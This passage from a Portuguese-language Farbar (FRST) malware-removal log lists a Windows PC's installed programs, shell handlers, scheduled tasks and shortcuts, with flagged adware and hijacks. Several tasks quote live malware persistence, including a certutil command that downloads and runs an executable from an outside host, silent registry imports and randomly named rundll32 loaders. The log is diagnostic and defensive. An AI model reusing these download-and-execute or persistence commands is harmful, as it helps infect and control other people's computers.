HTC Driver Installer (HKLM-x32\...\{4CEEE5D0-F905-4688-B9F9-ECC710507796}) (Version: 4.11.0.001 - Nome de sua empresasmile.png
iExplorer 3.9.0.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
Importação do SketchUp 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2963 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.9 - HTC)
IP-TV Player 0.28.1.8847 (HKLM-x32\...\IP-TV_Player) (Version: 0.28.1.8847 - ADSL Club Co Ltd)
IRPF2017 (HKLM-x32\...\IRPF2017) (Version: 1.1 - Receita Federal do Brasil)
IRPF2018 (HKLM-x32\...\IRPF2018) (Version: 1.4 - Receita Federal do Brasil)
Java 8 Update 171 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180171F0}) (Version: 8.0.1710.11 - Oracle Corporation)
Java(TM) SE Development Kit 9.0.1 (64-bit) (HKLM\...\{4AC8DBB2-1AE5-5156-83F9-D4E2E6DD564B}) (Version: 9.0.1.0 - Oracle Corporation)
K-Lite Mega Codec Pack 10.6.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.0 - )
Manager (HKLM-x32\...\{38251B9A-C44B-42D9-9A6A-0697986E334A}) (Version: 4.1.4.27792 - 2015 pdfforge GmbH. All rights reserved) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (Português do Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Build Tools 2013 (HKLM-x32\...\{2bceccd3-6613-4596-b748-441a06847696}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Build Tools 2015 (HKLM-x32\...\{d21da0dd-4ba4-4838-ba58-64cf7a77131a}) (Version: 14.0.23107.10 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2017 (HKLM-x32\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.10.30642.0 - Microsoft Corporation)
Mozilla Firefox 45.3.0 ESR (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 45.3.0 ESR (x86 pt-BR)) (Version: 45.3.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.3.0.6050 - Mozilla)
Nero 7 Essentials (HKLM-x32\...\{AAB93551-3FFE-42B2-8315-96252BBC1046}) (Version: 7.02.4861 - Nero AG)
NetBeans IDE 8.2 (HKLM\...\nbi-nb-base-8.2.0.0.201609300101) (Version: 8.2 - NetBeans.org)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
One Click Root (HKLM-x32\...\{CE749480-2B6D-4E38-B3B0-D8644C7B0287}) (Version: 1.00.0188 - One Click Root)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
PandaViewer (HKLM-x32\...\PandaViewer) (Version: - )
PC-CCID (HKLM\...\{3DCDFCDB-4D96-4CF0-9BB3-C91DAE9073F3}) (Version: 2.0.0 - Gemalto)
PDF Architect 4 (HKLM-x32\...\PDF Architect 4) (Version: 4.0.34.26215 - pdfforge GmbH)
PDF Architect 4 Create Module (HKLM\...\{72B9DF2C-76FA-40B5-A469-16EAB159CE72}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden
PDF Architect 4 Edit Module (HKLM\...\{BDF7326B-7ED4-4034-B867-F4E88D4E628B}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden
PDF Architect 4 View Module (HKLM\...\{03E04B47-9270-4613-8D7E-DA4AD2B259A0}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.3.0 - pdfforge GmbH)
PremierOpinion (HKLM-x32\...\{eeb86aef-4a5d-4b75-9d74-f16d438fc286}) (Version: 1.3.337.412 - VoiceFive, Inc.) <==== ATENÇÃO
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (HKLM\...\{90150000-001F-0416-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
S Agent (HKLM\...\{F49C89E7-14AC-4796-9C6A-49FA97890857}) (Version: 1.1.53 - Samsung Electronics CO., LTD.) Hidden
SafeFinder (HKLM-x32\...\{8E7CEB13-71CD-4684-9CE7-D3D0760EA499}) (Version: 1.0.0.0 - Linkury) <==== ATENÇÃO
SafeSign 64-bits (HKLM\...\{2DF407D3-A8AD-4ACF-BFD5-5F7D42EC62FD}) (Version: 3.0.87 - A.E.T. Europe B.V.)
Samsung SCX-3200 Series (HKLM-x32\...\Samsung SCX-3200 Series) (Version: - Samsung Electronics Co., Ltd.)
Samsung Update (HKLM-x32\...\{00ABE05F-DB49-4421-AA35-833DD9A9A94D}) (Version: 2.2.12 - Samsung Electronics CO., LTD.)
Scan Assistant (HKLM-x32\...\{BF6CF460-40C3-49BA-800A-4B934B6498B1}) (Version: 1.01.014 - Samsung Electronics Co., Ltd.)
SearchAwesome (HKLM\...\5850f7899b7a00e77740675180ff5f97) (Version: 13.14.1.242 (i1.0) - SearchAwesome) <==== ATENÇÃO
SecureW2 EAP Suite 1.1.3 for Windows (HKLM-x32\...\SecureW2 EAP Suite) (Version: - )
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.40 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.40.103 - Skype Technologies S.A.)
Speedycar version 1.0 (HKLM-x32\...\Speedycar_is1) (Version: 1.0 - MAL) <==== ATENÇÃO
Suporte para Aplicativos Apple (32-bit) (HKLM-x32\...\{7FA9ECCF-A2DE-4DA1-BFF3-81260DBDA68F}) (Version: 4.1.2 - Apple Inc.)
Suporte para Aplicativos Apple Apple (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
TDM-GCC (HKLM-x32\...\TDM-GCC) (Version: 1.1309.0 - TDM)
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.13 - Samsung Electronics CO., LTD.)
Unity (HKLM-x32\...\Unity) (Version: 5.6.2f1 - Unity Technologies ApS)
Universal Adb Driver (HKLM-x32\...\{D9C4202E-6D51-4B06-A8F1-22316E654BCA}) (Version: 1.0.0 - ClockworkMod)
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0416-1000-0000000FF1CE}_Office15.PROPLUS_{2BA6245D-FBB9-42F6-AFD9-C0DC52763AD5}) (Version: - Microsoft)
vs_communitymsi (HKLM-x32\...\{A041943F-C97B-48F6-8F23-C5078F99BB3A}) (Version: 15.0.26323 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{8DE51F5A-10B0-4697-89AC-A53AAFF4F02B}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{581E5656-26E2-4A02-9711-48C8E4998310}) (Version: 15.0.26208 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{15D591B0-7B40-4957-B6C0-EB7452B5AAB6}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{DC296244-0701-4EDE-9696-05B9C1D017B3}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{11230C85-1813-4BC3-9C24-E0B74B59653E}) (Version: 15.0.26208 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{9477F337-FD16-4ACA-8217-E2D7A0F92603}) (Version: 15.0.26301 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{497A5ACE-DA03-4412-A110-910B2C450720}) (Version: 15.0.26424 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{7B433884-CBD8-4DDB-9B61-06439DDBD774}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
Warsaw 2.4.2.1 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 2.4.2.1 - GAS Tecnologia)
Weather Lite 2.0.1.5000183 (HKLM\...\WeatherTool) (Version: 2.0.1.5000183 - ShenZhen Qianhailewang Technology Co,.Ltd)
Web Signer (HKLM-x32\...\{4D8BF29F-F66B-55FD-2BBF-D536A5BFA91F}) (Version: 2.3.1.22178 - Softplan Sistemas)
WhiteClick (HKLM-x32\...\{D66F6F24-652D-4405-A0D3-C568F825FE66}) (Version: 1.0.2 - AITI LODZHYK, TOV)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
YoutubeAdBlock (HKLM-x32\...\E3605470-291B-44EB-8648-745EE356599A) (Version: 2.0.0.548 - Company Inc.) <==== ATENÇÃO

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0007}\InprocServer32 -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0007}\InprocServer32 -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ContextMenuHandlers1: [AcShellExtension.AcContextMenuHandler] -> {2E7A2C6C-B938-40a4-BA1C-C7EC982DC202} => C:\Program Files\Common Files\Autodesk Shared\AcShellEx\AcShellExtension.dll [2016-02-07] (Autodesk)
ContextMenuHandlers1: [PDFArchitect4_ManagerExt] -> {3AECFCB3-8472-48E9-BC7B-5A3CD945C886} => C:\Program Files\PDF Architect 4\creator-context-menu.dll [2016-08-05] (pdfforge GmbH)
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Windows\system32\mscoree.dll [2010-11-04] (Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-01-16] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {0447AF66-1E42-4B9D-B8B5-68BCF1E4383C} - System32\Tasks\psv_Donfresh => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Daltzap.reg" & del "C:\ProgramData\Kipolam\Daltzap.reg" & SCHTASKS /Delete /TN "psv_Donfresh" /F <==== ATENÇÃO
Task: {0F9B2844-2E52-4C1D-A300-0B09414D732D} - System32\Tasks\HPCustParticipation HP Deskjet 2050 J510 series => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HPCustPartic.exe [2012-10-02] (Hewlett-Packard Co.)
Task: {150B32F0-AE41-4FE8-99F3-19B9C16A2BFE} - System32\Tasks\HPCeeScheduleForAlessandra => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {170488B0-BEF0-4CFE-A5A1-3B4ADAB6E1B4} - System32\Tasks\SUPatchForW10Up => C:\ProgramData\Samsung\SamsungUpdatePatch\SUPatchForW10Up.exe [2015-08-18] (Samsung Electronics CO., LTD.)
Task: {1ABEEBC4-8F8E-4312-B923-14403EEF87E1} - System32\Tasks\SAgent => C:\Program Files\Samsung\S Agent\CommonAgent.exe [2015-07-01] (Samsung Electronics CO., LTD.)
Task: {1B045A8B-90D6-415F-946A-C1A6C814199C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2017-06-22] (HP Inc.)
Task: {39278C0C-08E4-41F4-8965-77060F40FE0F} - System32\Tasks\{03632583-1770-4CCC-8DE9-B284E2B7FBF6} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\iGBPCEFwr.exe -d C:\Users\Alessandra\Downloads
Task: {3C3C9B9F-D544-418C-9793-0579CB90CBE1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {44FB4653-46A8-47FE-9FCF-51C733706461} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2018-05-04] (HP Inc.)
Task: {48A5DFB7-8B29-46B4-8437-90D94F9D909A} - System32\Tasks\{D53495F2-4971-42D6-820C-CAFE38FB5679} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanionInstaller.exe" -c --uninstall
Task: {497364D6-DFC7-4C5C-A89D-3AE3A0C0197A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {504ACFD9-3672-41E4-AC3E-FB1D499B6D78} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {59109EF6-2D9A-4C8D-9583-68EE313C63CB} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-05] () <==== ATENÇÃO
Task: {5D78EE72-CDB6-4C3C-B418-CBCF5D79A6F8} - System32\Tasks\{71CF92AC-5A7E-41CC-AF40-85EB5AADAB3B} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\jxpiinstall(3).exe -d C:\Users\Alessandra\Downloads
Task: {688AF2BE-283D-4C97-A9DF-EFF2BDF32296} - System32\Tasks\psv_Sumtough => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Kontouch.reg" & del "C:\ProgramData\Kipolam\Kontouch.reg" & SCHTASKS /Delete /TN "psv_Sumtough" /F <==== ATENÇÃO
Task: {71DBB70E-3A59-4444-9B75-98FE5A4607AA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2018-05-04] (HP Inc.)
Task: {76360668-09E3-4423-8586-E27FECFBC6BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-18] (Google Inc.)
Task: {78A08168-363C-45E2-8F18-5BACA73A8F1E} - System32\Tasks\rArHIXNWKfbeRtR2 => rundll32 "C:\Program Files (x86)\EgDGbQEiU\LudWWx.dll",#1
Task: {8A0C96B2-5EEF-41B4-8717-76347F43EEE7} - System32\Tasks\{D9E77BE1-6B7C-88AD-F011-BB3053FAFBC7} => C:\Users\Alessandra\VAxueQ.exe [1601-01-03] (Microsoft Corporation)
Task: {8E3C940E-2078-4126-B942-6E4F5E98D5E9} - System32\Tasks\psv_SaoLex => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Concom.reg" & del "C:\ProgramData\Kipolam\Concom.reg" & SCHTASKS /Delete /TN "psv_SaoLex" /F <==== ATENÇÃO
Task: {98A092FD-2BD3-4738-87C3-F14B00B00BC6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {9A1D7602-FDBE-42FE-9963-34F3023D5351} - System32\Tasks\{97FB065C-8365-8037-2DFF-FC795566A9AC} => C:\Program Files (x86)\Common Files\EeTooio.exe [1601-01-03] (Microsoft Corporation)
Task: {AB8FFAFE-BAB0-407C-9BB0-B44F1B7CA165} - System32\Tasks\{9347C7B1-634C-4A97-97D8-1311460842B3} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\JavaSetup8u71(3).exe -d C:\Users\Alessandra\Downloads
Task: {B11BCB1D-A1D3-4D99-81B7-657B4B0171C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2017-11-16] ()
Task: {B92E2E30-0528-4172-9905-9F78B98E7134} - System32\Tasks\psv_Goodlex => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Medfax.reg" & del "C:\ProgramData\Kipolam\Medfax.reg" & SCHTASKS /Delete /TN "psv_Goodlex" /F <==== ATENÇÃO
Task: {BC46DF61-2BDB-48B7-87FD-9E25BB3ECA70} - System32\Tasks\KnPQHVchzdGfrlHaz2 => rundll32 "C:\Program Files (x86)\OxoywZINBbQwrioRGrR\wvmrCDl.dll",#1
Task: {BD932F81-80E5-476E-A8ED-8B240C83E3E6} - System32\Tasks\XLqsfoKFUKuTqG => rundll32 "C:\Program Files (x86)\ijcQGTqqPStU2\oLSurdeWTWdxJ.dll",#1
Task: {CA2F5F1E-B67D-4475-BC4D-E9891A14244E} - System32\Tasks\FastDataX Task => C:\Program Files (x86)\FastDataX\FastDataX.exe [2018-05-30] () <==== ATENÇÃO
Task: {CB52A8F3-56DF-4EF1-B6C2-5965E26761FD} - System32\Tasks\WobUIKhuMtTTi2 => C:\Windows\system32\wscript.exe "C:\ProgramData\XjOPTLXDzAynQaVB\GSuArkt.wsf"
Task: {CB815659-E361-428C-AFA8-AC37DD20F8B5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2017-09-20] (HP Inc.)
Task: {CF7A2880-4D4E-464E-AC96-23D8F23D87FC} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\Alessandra\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Alessandra\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENÇÃO
Task: {E518EA10-6D1E-42F2-BFBE-A7BC78A10593} - System32\Tasks\AdobeGCInvoker-1.0-Alessandra-PC-Alessandra => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-05-11] (Adobe Systems, Incorporated)
Task: {EA709C1C-EDA1-4069-8905-106F4BACD9CE} - System32\Tasks\{0D4CA19C-26EE-4381-B4F0-441C292A1025} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\JavaSetup8u71(1).exe -d C:\Users\Alessandra\Downloads
Task: {EC0BCB80-FE1E-47A7-A511-CD424230F83D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2018-05-11] (HP Inc.)
Task: {EF156915-3036-4BFB-B817-69B801429648} - System32\Tasks\TdqeVjasHzsikvrWtEm2 => rundll32 "C:\Program Files (x86)\wCCFxMJCsZmzC\BQOQRHL.dll",#1
Task: {FBE0FDAB-73A7-4FD8-A64B-98E76035474C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2018-02-03] (AVAST Software)
Task: {FDC7E735-D275-4C8A-9C9E-8370E94F7724} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-18] (Google Inc.)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\Windows\Tasks\HPCeeScheduleForAlessandra.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Atalhos & WMI ========================

(As entradas podem ser listadas para serem restauradas ou removidas.)


ShortcutWithArgument: C:\Users\Alessandra\Desktop\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
